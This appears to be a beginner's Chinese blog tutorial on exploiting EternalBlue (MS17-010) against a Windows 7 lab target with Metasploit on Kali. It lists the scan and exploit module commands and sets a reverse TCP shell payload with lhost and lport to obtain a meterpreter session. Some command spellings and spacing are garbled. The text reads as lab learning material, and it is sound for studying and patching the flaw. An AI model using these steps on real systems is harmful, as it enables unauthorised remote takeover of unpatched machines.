Eternal Blue (永远的蓝色)-ms17-010渗透测试首次进行的渗透测试,也是第一次写博客。 等待着师傅的指出:)
工具
1 .靶机系统window7开放445和139端口
2.kali-Linux虚拟机
注意目标设备和主机IP位于同一网段(可以通过ping命令检查) ) ) ) ) ) ) ) ) ) )。
0x01更新在metasploitKali终端上键入msfconsole以启动metaspolit模块
然后输入apt-getinstallmetaspolit-framework。 (如果没有,请记住在root权限下,在命令前键入sudo并输入密码。 )
如果找到0x02漏洞并键入search ms17-010,将显示五行命令
应该是两行use auxiliary,三行use exploit命令
0x03扫描执行命令: use auxiliary/scanner/SMB/SMB _ ms17 _ 010
选择0x04排名靠前的攻击模块执行命令: use exploit/windows/SMB/ms17 _ 010 _ eternal blue
选择“show payloads (设置攻击负载)”默认选项即可。
一般为setpayloadgeneric/shell _ reverse _ TCP】
下一步show options (显示模块所需的配置参数) ) )。
set rhosts (靶机IP的安装) ) )。
set lhosts (主机IP设置) )。
set lport 4444 (监听端口) ) )。
0x05最后一步,渗透开始命令: exploit
或者也可以是run
如果成功,meterpreter就会出现
补445端口自己动手,丰衣足食